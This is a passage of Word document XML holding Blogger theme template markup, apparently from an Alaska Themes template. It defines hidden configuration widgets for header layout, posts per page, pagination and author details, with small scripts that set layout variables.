        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;div class='adminpanel' style='display:none;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:section id='adminbar' name='Posts Per Page' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:widget id='HTML993' locked='false' title='Header Layout' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='content'&gt;regular&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;script&gt;var hcls = &amp;#39;regular&amp;#39;;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:if cond='data:content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var hcls = &amp;#39;&lt;data:content/&gt;&amp;#39;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;/script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;script&gt;var hcls= &amp;#39;regular&amp;#39;;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $(document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                hcls = hcls.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if( (hcls == "regular") || (hcls == "full-logo") || (hcls == "compact") || (hcls == "center-full") || (hcls == "modern") ){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  $('header').removeClass('regular').addClass(hcls);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:widget id='HTML998' locked='false' title='Posts Per Page' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='content'&gt;6&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;script&gt;var perpage = 6;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:if cond='data:content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var perpage = &lt;data:content/&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;/script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;script&gt;var perpage=6;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              if(perpage){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if(isNaN(perpage)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  perpage = 6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:widget id='HTML995' locked='false' title='Posts Layout' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='content'&gt;default&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;script&gt;var postlayout = &amp;#39;default&amp;#39;;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:if cond='data:content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var postlayout = &amp;#39;&lt;data:content/&gt;&amp;#39;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;/script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;script&gt;var postlayout= &amp;#39;default&amp;#39;;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:widget id='HTML994' locked='false' title='Pagination Type' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='content'&gt;number&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;script&gt;var pagit = &amp;#39;number&amp;#39;;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:if cond='data:content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              var pagit = &amp;#39;&lt;data:content/&gt;&amp;#39;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &amp;lt;/script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;script&gt;var pagit= &amp;#39;number&amp;#39;;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:widget id='HTML992' locked='false' title='About Author Description' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='content'&gt;&lt;![CDATA[Alaska Themes a part of Blossom Themes, always find it's way to provide best and high quality blogger templates to all hardworking bloggers.]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div id='melesa-post-auth-desc'&gt;&lt;data:content/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;b:widget id='LinkList995' locked='false' title='Author Social Links' type='LinkList' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='link-3'&gt;http://plus.google.com&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='sorting'&gt;NONE&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='text-1'&gt;&lt;![CDATA[&lt;i class="fa fa-facebook"&gt;&lt;/i&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='link-1'&gt;http://twitter.com&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='text-0'&gt;&lt;![CDATA[&lt;i class="fa fa-twitter"&gt;&lt;/i&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='link-2'&gt;http://instagram.com&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='text-3'&gt;&lt;![CDATA[&lt;i class="fa fa-instagram"&gt;&lt;/i&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='link-0'&gt;http://facebook.com&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:widget-setting name='text-2'&gt;&lt;![CDATA[&lt;i class="fa fa-google-plus"&gt;&lt;/i&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div id='melesa-author-links'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:loop values='data:links' var='link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;li&gt;&lt;a expr:href='data:link.target'&gt;&lt;data:link.name/&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;div class='search-activity'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div class='searchwrap wrapper'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='searchoverlay'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;div class='searchbox-inner container'&gt;</w:t>
      </w:r>
    </w:p>
